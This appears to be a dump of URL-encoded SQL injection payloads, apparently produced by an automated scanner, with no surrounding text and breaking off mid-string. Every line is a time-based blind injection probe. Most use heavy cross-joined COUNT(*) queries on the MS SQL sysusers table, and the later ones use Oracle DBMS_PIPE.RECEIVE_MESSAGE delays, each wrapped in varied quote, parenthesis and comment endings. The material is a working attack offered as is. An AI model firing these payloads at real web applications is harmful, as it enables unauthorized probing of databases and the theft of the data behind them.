1%27%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27dMZs%27%3D%27dMZs 1%27%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27atXa%27%3D%27atXa 1%27%29%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27KeMf%27%3D%27KeMf 1%27%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27RBLC%27%3D%27RBLC 1%27%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27tXaH%27%20LIKE%20%27tXaH 1%27%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27iUjQ%27%20LIKE%20%27iUjQ 1%27%29%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27OJpf%27%20LIKE%20%27OJpf 1%27%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27SETo%27%20LIKE%20%27SETo 1%22%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22QhrI%22%3D%22QhrI 1%22%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22pLUO%22%3D%22pLUO 1%22%29%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22aBTQ%22%3D%22aBTQ 1%22%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22APuT%22%3D%22APuT 1%22%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22FfcJ%22%20LIKE%20%22FfcJ 1%22%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22vfMy%22%20LIKE%20%22vfMy 1%22%29%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22hBsl%22%20LIKE%20%22hBsl 1%22%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22Tpqs%22%20LIKE%20%22Tpqs 1%25%27%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27MfKX%27%3D%27MfKX 1%00%27%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27xQgx%27%3D%27xQgx 1%27%29%20WHERE%204467%3D4467%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1%22%29%20WHERE%206245%3D6245%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1%27%20WHERE%202436%3D2436%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1%22%20WHERE%201615%3D1615%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 1%27%7C%7C%28SELECT%20%27UtMb%27%20FROM%20DUAL%20WHERE%202931%3D2931%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27NItk%27%20WHERE%203928%3D3928%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%7C%7C%27 1%27%2B%28SELECT%20OrTO%20WHERE%204574%3D4574%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%2B%27 1%27%2B%28SELECT%20%27DSaS%27%20WHERE%203682%3D3682%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207157%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%23 1%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%29%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%29%20WHERE%206338%3D6338%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%20WHERE%206920%3D6920%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%25%27%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%25%27%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%25%27%29%29%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%25%27%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%00%27%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%00%27%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%29%20WHERE%202524%3D2524%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%29%20WHERE%206292%3D6292%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20WHERE%207184%3D7184%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%22%20WHERE%201522%3D1522%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%7C%7C%28SELECT%20%27VlLp%27%20FROM%20DUAL%20WHERE%207378%3D7378%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%7C%7C%28SELECT%20%27KyDZ%27%20WHERE%204220%3D4220%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%2B%28SELECT%20sxMr%20WHERE%204212%3D4212%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%2B%28SELECT%20%27DyDC%27%20WHERE%203741%3D3741%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201022%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29 1%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%287299%3D7299 1%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%285542%3D5542 1%29%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%288927%3D8927 1%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29 1%29%20WHERE%206741%3D6741%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20--%20 1%20WHERE%207767%3D7767%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20--%20 1%27%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29 1%27%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29 1%22%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29 1%27%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%27UxWw%27%3D%27UxWw 1%27%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%27oxRY%27%3D%27oxRY 1%27%29%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%28%27isez%27%3D%27isez 1%27%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%27xvLQ%27%3D%27xvLQ 1%27%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%27JcyE%27%20LIKE%20%27JcyE 1%27%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%27jkJS%27%20LIKE%20%27jkJS 1%27%29%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%28%27DcLL%27%20LIKE%20%27DcLL 1%27%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%27CsyN%27%20LIKE%20%27CsyN 1%22%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%22Ukfh%22%3D%22Ukfh 1%22%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%22wisB%22%3D%22wisB 1%22%29%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%28%22lRLt%22%3D%22lRLt 1%22%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%22sXdS%22%3D%22sXdS 1%22%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%22IKNN%22%20LIKE%20%22IKNN 